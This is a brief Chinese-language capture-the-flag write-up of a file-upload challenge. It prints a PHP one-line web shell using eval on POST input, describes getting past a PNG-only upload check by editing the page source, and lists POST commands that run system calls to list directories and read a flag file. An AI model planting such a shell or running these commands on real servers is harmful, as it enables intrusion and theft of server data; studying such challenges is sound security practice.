2022/4/5
先写一个一句话木马文件
<?php
eval($_POST[1]);
?>
试着上传php木马文件
上传失败
查看源码发现只能上传png文件
把它改成php
上传我们刚刚写的木马文件
访问我们刚刚上传的文件
利用Hackbar用post的方式提交
1=system("ls /");
没有发现flag的文件
查看上一层的目录用post的形式提交
1=system("ls ../");
发现了flag.php
直接访问他
1=system("tac ../flag.php");
得到flag